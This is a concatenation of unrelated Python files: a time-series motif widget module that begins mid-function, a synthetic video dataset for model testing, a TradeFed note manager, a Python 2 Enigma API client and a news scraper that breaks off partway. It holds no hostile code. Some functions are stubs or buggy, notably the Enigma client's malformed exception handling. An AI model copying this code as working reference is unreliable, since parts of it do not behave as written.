    widget.get_child("endTime").set_value(dates.epochToIsoString(middle + halfWidth))
    return True
def display_matches(functionNode,on=True):
    # NOTE(review): intentionally a no-op stub; the 'on' flag is ignored.
    return
def enable_show_motifs(functionNode):
    # NOTE(review): stub — the widget is resolved but nothing is done with it
    # yet; confirm whether this should call show_motifs(functionNode, True).
    widget = functionNode.get_parent().get_child("StumpyMASS.widget").get_target()
def show_motifs(functionNode, show):
    """Toggle the 'motifs' flag of the widget's visibleElements (if present)."""
    widget = functionNode.get_parent().get_child("StumpyMASS.widget").get_target()
    visible = widget.get_child("visibleElements").get_value()
    if "motifs" not in visible:
        return
    # only write back when the flag actually changes
    if visible["motifs"] != show:
        visible["motifs"] = show
        widget.get_child("visibleElements").set_value(visible)
    return
def hide(functionNode):
    """Remove the result curves from the widget and hide the motif overlay."""
    mining = functionNode.get_parent().get_child("StumpyMASS")
    hide_timeseries_results(mining)
    show_motifs(functionNode, False)
def _create_annos_from_matches(annoFolder, matches, maxMatches=None):
    """Replace the annotations in annoFolder with one annotation per match.

    maxMatches == 0 writes nothing; maxMatches is None writes all matches;
    otherwise only the first maxMatches entries are written.
    """
    for old in annoFolder.get_children():
        old.delete()
    if maxMatches == 0:
        return  # we don't write any annotation
    if maxMatches and maxMatches < len(matches):
        matches = matches[:maxMatches]
    for match in matches:
        annotation = annoFolder.create_child(type="annotation")
        properties = {
            "type": "time",
            "startTime": match["startTime"],
            "endTime": match["endTime"],
            "tags": ["pattern_match"],
        }
        for name, value in properties.items():
            annotation.create_child(properties={"name": name, "value": value, "type": "const"})
def delete(functionNode):
    """Hide the motif; envelope cleanup is currently disabled (commented out below)."""
    hide_motif(functionNode)
    # NOTE(review): 'motif' is resolved but unused because the envelope
    # deletion below is commented out — confirm whether it can be removed.
    motif = functionNode.get_parent().get_child("StumpyMASS").get_child("motif").get_target()
    #motif.get_child("envelope").delete()
    #remove all envelope info from the motif
    return True
def _connect(motif,widget,connect=True):
    """Attach (connect=True) or detach the motif's envelope curves
    (_limitMin/_limitMax/_expected) to/from the widget's selected variables.

    Returns False only when motif or widget is missing; otherwise True.
    """
    if not motif or not widget:
        return False
    try:
        lMax = None
        lMin = None
        exPe = None
        # pick the envelope's min/max/expected curves by name suffix
        if motif.get_child("envelope"):
            for child in motif.get_child("envelope").get_children():
                if "_limitMax" in child.get_name():
                    lMax = child
                elif "_limitMin" in child.get_name():
                    lMin = child
                elif "_expected" in child.get_name():
                    exPe = child
        if connect:
            # only connect when both limits exist; the expected curve is optional
            if lMax and lMin:
                if exPe:
                    widget.get_child("selectedVariables").add_references([exPe,lMin,lMax],allowDuplicates=False)
                else:
                    widget.get_child("selectedVariables").add_references([lMin, lMax],allowDuplicates=False)
        else:
            #disconnect
            elems = [elem for elem in [lMin,lMax,exPe] if elem] #remove the nones
            if elems:
                widget.get_child("selectedVariables").del_references(elems)
        return True
    except Exception as ex:
        # NOTE(review): broad catch — the traceback is printed but True is
        # still returned below, so failures are reported as success; `ex` is
        # unused. Confirm whether False should be returned here instead.
        import traceback
        print(traceback.format_exc())
    return True
def update(functionNode,startTime=0):
    """Resample the motif's variable over the motif's time window.

    NOTE(review): the resampled data (and the value-offset correction applied
    when startTime is given) is computed but never stored or returned — apart
    from the node lookups this function currently has no observable effect.
    """
    # allow being called on a sibling node; normalize to the "update" node
    if functionNode.get_name()!="update":
        functionNode = functionNode.get_parent().get_child("update")
    motif = functionNode.get_parent().get_child("StumpyMASS").get_child("motif").get_target()
    widget = functionNode.get_parent().get_child("StumpyMASS").get_child("widget").get_target()
    logger = functionNode.get_logger()
    start = dates.date2secs(motif.get_child("startTime").get_value())
    end = dates.date2secs(motif.get_child("endTime").get_value())
    # one resample point per epoch second across the motif window
    times = numpy.arange(start, end)
    ts = motif.get_child("variable").get_target().get_time_series(start,end,resampleTimes = times)
    data = ts["values"]
    if startTime!=0:
        # shift the sampling grid to the requested start time
        diff = startTime-start
        times=times+diff
        #value offset
        ts = motif.get_child("variable").get_target().get_time_series(resampleTimes = times)
        dataDiff = ts["values"][0]-data[0]
        data = data +dataDiff
    return True
def debug_help_vis(distance_profile, minimaRelPeakWD, idxSortDistProfMinimaExc):
    """Dump the intermediate matching arrays to CSV text files for offline inspection."""
    dumps = (
        ("profile.txt", distance_profile),
        ("minRelPeakWD.txt", minimaRelPeakWD),
        ("idxSotedProfExc.txt", idxSortDistProfMinimaExc),
    )
    for filename, array in dumps:
        numpy.savetxt(filename, array, delimiter=',')
    return True
def stumpy_print_z_normalized_labeled_2_axis(querySeriesValues, timeSeriesValues, idx, label, varName):
    """Save two comparison plots of a query against its nearest neighbor.

    Writes two PNGs under MASS_4/: one comparing the z-normalized query and
    full series on twin axes, and one comparing the raw query against the
    matched excerpt of the series.

    :param querySeriesValues: a subsequence (motif) of the full time series (like mass)
    :param timeSeriesValues: the full time series values (like mass)
    :param idx: index position of the nearest neighbor to the query (result of the stumpy mass function)
    :param label: string used as a name/label for the figure files
    :param varName: string that represents the name of the variable
    :return: True
    """
    # Since MASS computes z-normalized Euclidean distances,
    # we should z-normalize our subsequences before plotting
    querylength = querySeriesValues.size
    querySeriesValues_z_norm = stp.core.z_norm(querySeriesValues)
    timeSeriesValues_z_norm = stp.core.z_norm(timeSeriesValues)
    timeSeriesValues = timeSeriesValues
    # figure 1: z-normalized query vs. z-normalized full series, twin y-axes
    fig, ax1 = plt.subplots()
    ax1.set_xlabel('Time', fontsize ='12')
    ax1.set_ylabel('Motif / query ', fontsize='12', color = 'blue')
    ax1.plot(querySeriesValues_z_norm, lw=2, color="blue", label="Query z-norm")
    ax1.tick_params(axis='y', labelcolor='blue')
    ax2 = ax1.twinx() ### instantiate a secondary axis that shares the same x-axis
    ax2.set_ylabel('TS match (excerpt TS)', fontsize='12', color = 'red')
    ax2.plot(timeSeriesValues_z_norm, lw=2, color = "red", label="TS z-norm")
    ax2.tick_params(axis='y', labelcolor='red')
    fig.tight_layout() # otherwise the right y-label is slightly clipped
    plt.legend()
    plt.savefig('MASS_4/Z_norm_cross_norm' + varName + '_' + label + '.png')
    plt.close(fig)
    # figure 2: raw query vs. the raw matched excerpt at position idx
    fig, ax1 = plt.subplots()
    ax1.set_xlabel('Time', fontsize='12')
    ax1.set_ylabel('Motif / query ', fontsize='12', color='blue')
    ax1.plot(querySeriesValues, lw=2, color="blue", label="Query z-norm")
    ax1.tick_params(axis='y', labelcolor='blue')
    ax2 = ax1.twinx() ### instantiate a secondary axis that shares the same x-axis
    ax2.set_ylabel('TS match (excerpt TS)', fontsize='12', color='red')
    ax2.plot(timeSeriesValues[idx:idx+querylength], lw=2, color="red", label="TS z-norm")
    ax2.tick_params(axis='y', labelcolor='red')
    fig.tight_layout() # otherwise the right y-label is slightly clipped
    plt.legend()
    plt.savefig('MASS_4/ORIG_cross_norm' + varName + '_' + label + '.png')
    plt.close(fig)
    return True
def stumpy_print_z_normalized_labeled_1_axis(querySeriesValues, timeSeriesValues, timeSeriesTimes, idx, label, varName):
    """Plot the z-normalized query against its nearest neighbor on a single axis and save as PNG.

    `timeSeriesTimes` and `idx` are unused but kept for interface compatibility
    with the other plotting helpers in this module.
    """
    query_z = stp.core.z_norm(querySeriesValues)
    series_z = stp.core.z_norm(timeSeriesValues)
    figure = plt.figure()
    plt.suptitle('Comparing The Query To Its Nearest Neighbor', fontsize='11')
    plt.xlabel('Time', fontsize='11')
    plt.ylabel('Motif Variable', fontsize='11')
    plt.plot(series_z, lw=2, color="red", label="Nearest Neighbor")
    plt.plot(query_z, lw=2, color="blue", label="Query , querySeries")
    plt.legend()
    plt.savefig('MASS_4/1_Axis_Z_norm_cross_norm' + varName + '_' + label + '.png')
    plt.close(figure)
    return True
|
<reponame>deep-cube/deep-cube
import torch
import os
import numpy as np
from tqdm import tqdm
from pprint import pprint
from data_utils import array_to_video_view
class SingleSquareActivatedDataset(torch.utils.data.Dataset):
    def __init__(
        self,
        L, C, H, W,
        square_persistence_length=1,
        use_background_noise=False,
        dataset_length=100
    ):
        """
        a dataset that generates dummy training data to test a conv+recurrent model
        by populating frames of data with a black background / noise background
        then a fixed number of frames with a stationary white square of size exactly
        a quarter of the frame, in a random position, the frames with the squares in
        them depend on the label.
        intuitively, a model should be able to learn this simple pattern of "observing
        n consecutive white square should produce a prediction of 1, otherwise 0"
        Args:
        - L (int): length of each clip
        - C (int): num channel
        - H (int): height of frame
        - W (int): width of frame
        - square_persistence_length (int, optional): number of white squares before
            a prediction of 1. Defaults to 1.
        - use_background_noise (bool, optional): if true, background is random noise
            pixles, if false, background is black. Defaults to False.
        - dataset_length (int, optional): number of clips in the dataset. Defaults to 100.
        """
        self.C, self.H, self.W, self.L = C, H, W, L
        # square edge is half the smaller frame dimension (a quarter of the area)
        self.square_size = min(H, W) // 2
        self.use_background_noise = use_background_noise
        self.dataset_length = dataset_length
        self.square_persistence_length = square_persistence_length
        # created lazily in __getitem__ (unseeded, so items are non-deterministic)
        self.random_state = None

    def __len__(self):
        # number of clips in the dataset
        return self.dataset_length

    def __getitem__(self, idx):
        # lazy RNG creation; idx is ignored — every item is freshly random
        if self.random_state is None:
            self.random_state = np.random.RandomState()
        # ~10% of the L frames are labeled positive
        y = self.random_state.choice(
            2,
            size=(self.L,),
            p=[0.9, 0.1]
        )
        # suppress positives that fall inside the persistence window of an
        # earlier positive.
        # NOTE(review): for l < square_persistence_length the slice start is
        # negative and wraps to the end of y, and range(self.L-1) never checks
        # the last frame — confirm both are intended.
        for l in range(self.L-1):
            if y[l-self.square_persistence_length:l].sum() > 0:
                y[l] = 0
        if self.use_background_noise:
            x = self.random_state.choice(
                256, size=(self.L, self.C, self.H, self.W))
        else:
            x = np.zeros((self.L, self.C, self.H, self.W))
        for l in range(self.L):
            # NOTE(review): the first persistence_length frames keep their y
            # label but never get a square drawn — confirm this is intended.
            if l < self.square_persistence_length:
                continue
            if y[l] == 1:
                # draw a near-white square of persistence_length frames at a
                # random position ending at frame l
                up = self.random_state.choice(self.H - self.square_size)
                down = up + self.square_size
                left = self.random_state.choice(self.W - self.square_size)
                right = left + self.square_size
                x[
                    l+1-self.square_persistence_length: l+1,
                    :, up:down, left:right
                ] = 255 - self.random_state.choice(20)
        return x, y, len(y)
class SingleSquareActivatedMultiClassCTCDataset(torch.utils.data.Dataset):
    def __init__(
        self,
        L, C, H, W,
        square_persistence_length=1,
        use_background_noise=False,
        dataset_length=100
    ):
        """
        a dataset that generates dummy training data to test a conv+recurrent model
        by populating frames of data with a black background / noise background
        then a fixed number of frames with a stationary white square of size exactly
        a quarter of the frame, in a random position, the frames with the squares in
        them depend on the label. The square is drawn into a single random
        channel, and the collapsed CTC label sequence is the 1-based index of
        that channel per event.
        Args:
        - L (int): length of each clip
        - C (int): num channel
        - H (int): height of frame
        - W (int): width of frame
        - square_persistence_length (int, optional): number of white squares before
            a prediction of 1. Defaults to 1.
        - use_background_noise (bool, optional): if true, background is random noise
            pixles, if false, background is black. Defaults to False.
        - dataset_length (int, optional): number of clips in the dataset. Defaults to 100.
        """
        self.C, self.H, self.W, self.L = C, H, W, L
        # square edge is half the smaller frame dimension (a quarter of the area)
        self.square_size = min(H, W) // 2
        self.use_background_noise = use_background_noise
        self.dataset_length = dataset_length
        self.square_persistence_length = square_persistence_length
        # created lazily in __getitem__ (unseeded, so items are non-deterministic)
        self.random_state = None

    def __len__(self):
        # number of clips in the dataset
        return self.dataset_length

    def __getitem__(self, idx):
        # lazy RNG creation; idx is ignored — every item is freshly random
        if self.random_state is None:
            self.random_state = np.random.RandomState()
        # ~10% of the L frames are event positives
        y = self.random_state.choice(
            2,
            size=(self.L,),
            p=[0.9, 0.1]
        )
        # CTC-style collapsed label sequence (one entry per drawn event)
        collapsed_y = []
        # suppress positives inside the persistence window of an earlier one.
        # NOTE(review): same caveats as SingleSquareActivatedDataset — the
        # slice start wraps for small l and the last frame is never checked.
        for l in range(self.L-1):
            if y[l-self.square_persistence_length:l].sum() > 0:
                y[l] = 0
        if self.use_background_noise:
            x = self.random_state.choice(
                256, size=(self.L, self.C, self.H, self.W))
        else:
            x = np.zeros((self.L, self.C, self.H, self.W))
        for l in range(self.L):
            if l < self.square_persistence_length:
                continue
            if y[l] == 1:
                # pick a random square position ending at frame l
                up = self.random_state.choice(self.H - self.square_size)
                down = up + self.square_size
                left = self.random_state.choice(self.W - self.square_size)
                right = left + self.square_size
                # black out the square in all channels ...
                x[
                    l+1-self.square_persistence_length: l+1,
                    :, up:down, left:right
                ] = 0
                # ... then light it up in one random channel; the label is that
                # channel's 1-based index (0 is reserved for the CTC blank)
                channel_to_activate = self.random_state.choice(self.C)
                x[
                    l+1-self.square_persistence_length: l+1,
                    channel_to_activate, up:down, left:right
                ] = 255
                collapsed_y.append(channel_to_activate + 1)
        # pad the collapsed labels to fixed length L; also return true length
        l = len(collapsed_y)
        collapsed_y = np.pad(
            np.array(collapsed_y, dtype=np.uint8), ((0, self.L - l)))
        return x, collapsed_y, l
if __name__ == "__main__":
    # Smoke test for the CTC dataset.
    # Bug fixes: the constructor takes (L, C, H, W) — the channel count was
    # missing (only 3 positional args were passed) — and __getitem__ returns a
    # 3-tuple (x, collapsed_y, length), not a pair.
    # NOTE(review): C=3 chosen to match the commented example below — confirm.
    ds = SingleSquareActivatedMultiClassCTCDataset(
        30, 3, 100, 100,
        square_persistence_length=1,
        use_background_noise=True,
    )
    x, y, label_len = ds[0]
    print(y)
    print(x.shape, y.shape, label_len)
    array_to_video_view(x)
|
<filename>tradefed_cluster/note_manager.py<gh_stars>0
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""A module for note management."""
import datetime
import logging
import lazy_object_proxy
from protorpc import protojson
from tradefed_cluster.util import ndb_shim as ndb
from tradefed_cluster import common
from tradefed_cluster import datastore_entities
from tradefed_cluster import env_config
from tradefed_cluster.util import pubsub_client
DEVICE_NOTE_PUBSUB_TOPIC = "projects/%s/topics/%s" % (env_config.CONFIG.app_id,
"device_note")
HOST_NOTE_PUBSUB_TOPIC = "projects/%s/topics/%s" % (env_config.CONFIG.app_id,
"host_note")
class InvalidParameterError(ValueError):
    """The error of invalid function parameter (e.g. an unknown or mistyped message id)."""
def GetPredefinedMessage(message_type, lab_name, content):
  """Get PredefinedMessage from datastore that matches the fields.

  Args:
    message_type: enum, common.PredefinedMessageType, type of PredefinedMessage.
    lab_name: str, the lab where the message is created.
    content: str, content of the message.

  Returns:
    A datastore_entities.PredefinedMessage, or None if not found.
  """
  query = datastore_entities.PredefinedMessage.query()
  query = query.filter(datastore_entities.PredefinedMessage.type == message_type)
  query = query.filter(datastore_entities.PredefinedMessage.lab_name == lab_name)
  query = query.filter(datastore_entities.PredefinedMessage.content == content)
  matches = query.fetch(1)
  return matches[0] if matches else None
def GetOrCreatePredefinedMessage(message_type, lab_name, content):
  """Get PredefinedMessage datastore entity or create it if not existing.

  Args:
    message_type: enum, common.PredefinedMessageType, type of PredefinedMessage.
    lab_name: str, the lab where the message is created.
    content: str, content of the message.

  Returns:
    An instance of datastore_entities.PredefinedMessage.
  """
  existing_message = GetPredefinedMessage(
      message_type=message_type, lab_name=lab_name, content=content)
  if existing_message:
    return existing_message
  # not found: build a fresh (not yet persisted) entity
  return datastore_entities.PredefinedMessage(
      type=message_type,
      content=content,
      lab_name=lab_name,
      create_timestamp=datetime.datetime.utcnow())
def PreparePredefinedMessageForNote(
    message_type, message_id=None, lab_name=None, content=None, delta_count=1):
  """Prepare a PredefinedMessage to attach to a Note.

  This method prepares a PredefinedMessage in following ways:
  - if message_id is provided, find the message with id, or
  - if content is provided, get the existing message matching the content, or
    create a new message with the content
  - if neither is provided, return None

  Args:
    message_type: enum, common.PredefinedMessageType, type of PredefinedMessage.
    message_id: int, the ID of PredefinedMessage.
    lab_name: str, the lab where the message is created.
    content: str, content of the message.
    delta_count: the delta used_count to be added.

  Returns:
    An instance of datastore_entities.PredefinedMessage.

  Raises:
    InvalidParameterError: when the message_id is not valid or it leads to a
      wrong PredefinedMessage type.
  """
  message = None
  if message_id:
    message = ndb.Key(
        datastore_entities.PredefinedMessage, message_id).get()
    # the id must resolve to an existing message of the requested type
    if not message or message.type != message_type:
      raise InvalidParameterError(
          "Invalid predefined_message_id: %s" % message_id)
  elif content:
    message = GetOrCreatePredefinedMessage(message_type, lab_name, content)
  if message:
    message.used_count += delta_count
  return message
def _Now():
  """Returns the current time in UTC. Added to allow mocking in our tests."""
  # NOTE(review): returns a *naive* datetime; datetime.utcnow() is deprecated
  # from Python 3.12 — consider datetime.now(timezone.utc) once callers accept
  # timezone-aware values.
  return datetime.datetime.utcnow()
def _CreatePubsubClient():
  """Create a Google Cloud Pub/Sub client with both note topics ensured."""
  client = pubsub_client.PubSubClient()
  for topic in (DEVICE_NOTE_PUBSUB_TOPIC, HOST_NOTE_PUBSUB_TOPIC):
    client.CreateTopic(topic)
  return client
_PubsubClient = lazy_object_proxy.Proxy(_CreatePubsubClient)
def PublishMessage(device_note_message, event_type):
  """Publish a device/host note event message to Pub/Sub.

  Args:
    device_note_message: protorpc message to publish; its publish_timestamp
      field is stamped with the current UTC time.
    event_type: common.PublishEventType selecting the target topic.
  """
  if not env_config.CONFIG.use_google_api:
    # Fixed typo in the log message ("Unabled" -> "Unable").
    logging.warning(
        "Unable to send device note message to pubsub: use_google_api=False"
    )
    return
  device_note_message.publish_timestamp = _Now()
  encoded_message = protojson.encode_message(device_note_message)  # pytype: disable=module-attr
  data = common.UrlSafeB64Encode(encoded_message)
  if event_type == common.PublishEventType.DEVICE_NOTE_EVENT:
    data_type = "deviceNote"
    topic = DEVICE_NOTE_PUBSUB_TOPIC
  else:
    data_type = "hostNote"
    topic = HOST_NOTE_PUBSUB_TOPIC
  _PubsubClient.PublishMessages(topic, [{
      "data": data,
      "attributes": {
          "type": data_type,
      }
  }])
|
from datetime import date, datetime
import decimal
import requests
import warnings
# Base URL and version prefix used by every Enigma API request.
API_ENDPOINT = 'https://api.enigma.io'
API_VERSION = 'v2'
# Data type mappings are based on PL/Python PostgreSQL to Python mappings
# http://www.postgresql.org/docs/9.4/static/plpython-data.html
# Maps Enigma/PostgreSQL type names to Python types.
# NOTE(review): `long` exists only in Python 2; this module is Python 2 code —
# porting to Python 3 requires `int` here.
_data_type_codec = {
    'bigint': long,
    'boolean': bool,
    'bytea': str,
    'character varying': str,
    'date': date,
    'double': float,
    'double precision': float,
    'int': int,
    'integer': int,
    'numeric': decimal.Decimal,
    'oid': long,
    'real': float,
    'smallint': int,
    'text': str,
    'timestamp without time zone': datetime,
    'timestamp': datetime,
    # NOTE(review): presumably a deliberate guard against an upstream
    # 'varcahr' typo — confirm before "fixing" the key.
    'varcahr': str
}
def _map_metadata_data_type(metadata_columns):
    '''Return the column data from the MetaData endpoint with corresponding
    Python data types included. Even though this is used in only one place, it
    has been separated out to facilitate testing.
    '''
    for column in metadata_columns:
        # Data types returned by the MetaData endpoint are prefixed with type_;
        # strip the prefix and look the remainder up, defaulting to str.
        type_name = ' '.join(column['type'].split('_')[1:])
        column['python_type'] = _data_type_codec.get(type_name, str)
    return metadata_columns
class EnigmaAPI(object):
'''The EnigmaAPI provides access to the five different endpoints of the
Enigma API: meta, data, stats, export, and limits.
ARGUMENTS
---------
client_key : a string corresponding to a valid API key
EXAMPLE
-------
>>> from pynigma import client
>>> import os
>>> ENIGMA_API_KEY = os.environ['ENIGMA_API_KEY']
>>> api = client.EnigmaAPI(ENIGMA_API_KEY)
>>> api
<EnigmaAPI(endpoint=https://api.enigma.io, version=v2)>
'''
_param_mapping = {
'meta': ['page'],
'data': ['limit', 'select', 'search',
'where', 'conjunction', 'sort', 'page'],
'stats': ['select', 'operation', 'by', 'of', 'limit',
'search', 'where', 'conjunction', 'sort', 'page'],
'export': ['select', 'search', 'where', 'conjunction', 'sort'],
'limits': []
}
def __init__(self, client_key):
self.client_key = client_key
self._endpoint = API_ENDPOINT
self._version = API_VERSION
self.request_url = None
def __repr__(self):
return '<EnigmaAPI(endpoint={endpoint}, version={version})>'.format(
endpoint=self._endpoint, version=self._version)
def _check_query_params(self, resource, **kwargs):
invalid_params = set(
kwargs.keys()) - set(self._param_mapping[resource])
if invalid_params:
raise ValueError(
'Invalid parameters for the {0} endpoint passed: {1}'.format(
resource, invalid_params))
return True
def _url_for_datapath(self, resource, datapath, **kwargs):
if self._check_query_params(resource=resource, **kwargs):
base_url = '/'.join(
[self._endpoint, self._version, resource, self.client_key])
# There is no datapath associated with the limits endpoint.
if datapath:
params = ['='.join([k, v]) for k, v in kwargs.iteritems()]
return '/'.join([base_url, datapath, '?' + '&'.join(params)])
return base_url
def _request(self, resource, datapath, **kwargs):
self.request_url = self._url_for_datapath(
resource, datapath, **kwargs)
try:
res = requests.get(self.request_url)
except res.status_code != 200:
warnings.warn('Request returned with status code: {0}.'.format(
res.status_code))
finally:
return res.json()
def get_data(self, datapath, **kwargs):
'''Returns an HTTP response from the data endpoint as decoded JSON.
ARGUMENTS
---------
datapath : a string corresponding to the dataset requested
**kwargs : a dictionary of keyword arguments corresponding
to the provided query parameters and values
EXAMPLE
-------
>>> data = api.get_data(datapath='us.gov.whitehouse.salaries.2011')
>>> data['result'][0] # the first salary in the dataset
{u'status': u'Employee', u'salary': u'70000.00',
u'name': u'Abrams, <NAME>. ', u'pay_basis': u'Per Annum',
u'position_title': u'REGIONAL COMMUNICATIONS DIRECTOR', u'serialid': 1}
'''
return self._request(resource='data', datapath=datapath, **kwargs)
def get_metadata(self, datapath, **kwargs):
'''Returns an HTTP response from the metadata endpoint as decoded JSON.
The column metadata will include an additional key, 'python_type',
representing the corresponding Python data type. If the Python data
type can't be determined, it will default to str.
ARGUMENTS
---------
datapath : a string corresponding to the dataset requested
**kwargs : a dictionary of keyword arguments corresponding
to the provided query parameters and values
EXAMPLE
-------
>>> metadata = api.get_metadata(
datapath='us.gov.whitehouse.visitor-list')
>>> for column in metadata['result']['columns'][:5]:
... print column['label']
Last Name
First Name
Middle Initial
Full Name
Appointment Number
'''
metadata_res = self._request(
resource='meta', datapath=datapath, **kwargs)
metadata_res['result']['columns'] = _map_metadata_data_type(
metadata_res['result']['columns'])
return metadata_res
def get_stats(self, datapath, **kwargs):
'''Returns an HTTP response from the stats endpoint as decoded JSON.
ARGUMENTS
---------
datapath : a string corresponding to the dataset requested
**kwargs : a dictionary of keyword arguments corresponding
to the provided query parameters and values
EXAMPLE
-------
>>> stats = api.get_stats(datapath='us.gov.whitehouse.visitor-list',
**{'select': 'type_of_access'})
>>> for type in stats['result']['frequency']:
... print type['type_of_access'], type['count']
VA 4368369
AL 32278
PE 12
WO 8
None 0
'''
return self._request(resource='stats', datapath=datapath, **kwargs)
def get_export(self, datapath, **kwargs):
    '''Query the export endpoint and return the decoded JSON response.

    ARGUMENTS
    ---------
    datapath : a string identifying the requested dataset
    **kwargs : query parameters forwarded verbatim to the API

    EXAMPLE
    -------
    >>> export = api.get_export(datapath='us.gov.whitehouse.visitor-list')
    >>> print export['head_url']
    https://enigma-api-export...
    '''
    # Thin wrapper: all work happens in the shared request helper.
    return self._request(resource='export', datapath=datapath, **kwargs)
def get_limits(self, resource='limits'):
    '''Query the limits endpoint and return the decoded JSON response.

    ARGUMENTS
    ---------
    resource : endpoint name; defaults to 'limits'.
        Bug fix: this parameter was previously accepted but silently
        ignored — the endpoint name was hard-coded in the request call.
        It is now honoured (default behaviour is unchanged).

    EXAMPLE
    -------
    >>> api.get_limits()
    {u'seconds_remaining': 1305446, u'stats': 9999, u'period': u'monthly',
    u'meta': 9996, u'export': 48, u'data': 9891}
    '''
    return self._request(resource=resource, datapath=None)
|
import requests
import json
from bs4 import BeautifulSoup
from src.scripts.scrapper.resources.css_attributes import *
from src.utils import log
from src.utils import io
# Desktop-Chrome User-Agent so the news sites serve their normal desktop markup
# instead of blocking/redirecting an unidentified scraper.
headers = {
    'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.106 Safari/537.36'
}
# Groups of site attribute-configs that need a non-default body extractor
# (see make_request): TYPE_TWO splits on <br/>, TYPE_THREE handles a lead
# paragraph plus nested <div>, TYPE_FOUR uses find_all over the whole page.
TYPE_TWO = [ELPLURAL]
TYPE_THREE = [HAYNOTICIAS]
TYPE_FOUR = [ELINFOBAE, PUBLICO]
def get_title(soup, attr):
    """Extract the article title per the site config *attr*.

    Returns the title text with newlines stripped, or '' when the
    configured element is not present on the page.

    Bug fix: a missing title element used to raise AttributeError
    (``None.text``); since get_all_news only catches ValueError, one
    malformed page aborted the whole scrape loop.
    """
    if 'attr' in attr['title']:
        title_soup = soup.find(attr['title']['name'], attr['title']['attr'])
    else:
        title_soup = soup.find(attr['title']['name'])
    if title_soup is None:
        # Same "element absent" convention as get_subtitle.
        return ''
    return title_soup.text.replace("\n", "")
def get_subtitle(soup, attr):
    """Extract the article subtitle per the site config *attr*.

    Returns:
      -1  when the site config has no 'subtitle' entry (lets callers
          distinguish "not configured" from "not found on page"),
      ''  when the configured element is absent from the page,
      otherwise the subtitle text with newlines stripped.
    """
    if 'subtitle' not in attr:
        return -1
    if 'attr' in attr['subtitle']:
        subtitle_soup = soup.find(
            attr['subtitle']['name'], attr['subtitle']['attr'])
    else:
        subtitle_soup = soup.find(attr['subtitle']['name'])
    # Idiom fix: compare to None with `is`, not `!=`.
    if subtitle_soup is None:
        return ''
    return subtitle_soup.text.replace("\n", "")
def get_body(soup, attr):
    """Collect the article paragraphs: text of the direct <p> children of
    the configured container, newline-stripped, skipping empty/trivial
    (length <= 2) fragments."""
    spec = attr['text']
    if 'attr' in spec:
        container = soup.find(spec['name'], spec['attr'])
    else:
        container = soup.find(spec['name'])
    paragraphs = []
    for node in container.find_all('p', recursive=False):
        text = node.text
        if not text:
            continue
        text = text.replace("\n", "")
        if len(text) > 2:  # drop empty / whitespace-only fragments
            paragraphs.append(text)
    return paragraphs
def get_body_type_two(soup, attr):
    """Paragraph extractor for sites (TYPE_TWO) that separate paragraphs
    with <br/> instead of <p> tags.

    Splits the container's raw markup on '<br/>' and re-parses each
    fragment to strip the remaining tags.
    """
    body_soup = soup.find(attr['text']['name'], attr['text']['attr'])
    paragraph_list = str(body_soup).split('<br/>')
    result = []
    for p in paragraph_list:
        # Bug fix: BeautifulSoup(p) with no parser emits
        # GuessedAtParserWarning and may pick different parsers on
        # different machines; use 'html.parser' explicitly, matching
        # make_request.
        clean_p = BeautifulSoup(p, 'html.parser')
        if len(clean_p.text) > 2:  # skip empty/trivial fragments
            result.append(clean_p.text)
    return result
def get_body_type_three(soup, attr):
    """Paragraph extractor for sites (TYPE_THREE) whose article body has an
    optional stand-alone lead <p> followed by a nested <div> holding the
    remaining paragraphs as direct <p> children."""
    container = soup.find(attr['text']['name'], attr['text']['attr'])
    paragraphs = []
    # Optional lead paragraph before the inner <div>.
    lead = container.find('p')
    if lead is not None and len(lead.text) > 2:
        paragraphs.append(lead.text)
    # Remaining paragraphs live inside the first nested <div>.
    inner = container.find('div')
    for node in inner.find_all('p', recursive=False):
        text = node.text
        if not text:
            continue
        text = text.replace("\n", "")
        if len(text) > 2:  # drop empty/trivial fragments
            paragraphs.append(text)
    return paragraphs
def get_body_type_four(soup, attr):
    """Paragraph extractor for sites (TYPE_FOUR) where every paragraph is
    its own matching element anywhere in the document (find_all over the
    whole soup rather than one container)."""
    matches = soup.find_all(attr['text']['name'], attr['text']['attr'])
    paragraphs = []
    for node in matches:
        text = node.text
        if not text:
            continue
        text = text.replace("\n", "")
        if len(text) > 2:  # drop empty/trivial fragments
            paragraphs.append(text)
    return paragraphs
def make_request(url, attr):
    """Fetch *url* and scrape title, subtitle, body and URL into a dict.

    *attr* is the per-site CSS configuration (see get_variable); the body
    extractor is chosen by which TYPE_* group the config belongs to.
    Returns {} when the HTTP status is not 200.
    """
    article = {}
    response = requests.get(url, headers=headers)
    if response.status_code != 200:
        return article
    soup = BeautifulSoup(response.text, 'html.parser')
    # Title
    article['title'] = get_title(soup, attr)
    # Subtitle (-1 means "not configured for this site").
    subtitle = get_subtitle(soup, attr)
    article['subtitle'] = subtitle if subtitle != -1 else ''
    # Body: pick the extractor matching this site's layout family.
    if attr in TYPE_TWO:
        article['text'] = get_body_type_two(soup, attr)
    elif attr in TYPE_THREE:
        article['text'] = get_body_type_three(soup, attr)
    elif attr in TYPE_FOUR:
        article['text'] = get_body_type_four(soup, attr)
    else:
        article['text'] = get_body(soup, attr)
    # URL
    article['url'] = url
    return article
def get_variable(var):
    """Map a news-site domain name to its CSS attribute configuration.

    Returns -1 for unknown domains so callers can skip them.
    """
    site_attributes = {
        'abc.com': ABC,
        'lavanguardia.com': LA_VANGUARDIA,
        'marca.com': MARCA,
        'esdiario.com': ESDIARIO,
        'mediterraneodigital.com': MEDITERRANEO,
        'alertadigital.com': ALERTADIGITAL,
        'cataladigital.com': CATALADIGITAL,
        'europapress.com': EUROPAPRESS,
        'gomeraactualidad.com': GOMERAACTUALIDAD,
        'periodistadigital.com': PERIODISTADIGITAL,
        'elplural.com': ELPLURAL,
        'antena3.com': ANTENA3,
        'lasexta.com': LASEXTA,
        'elperiodico.com': ELPERIODICO,
        'elmundo.es': ELMUNDO,
        '20minutos.com': XXMINUTOS,
        'elpais.com': ELPAIS,
        'gaceta.es': LAGACETA,
        # 'elespanol.com': ELESPANOL
        'haynoticias.es': HAYNOTICIAS,
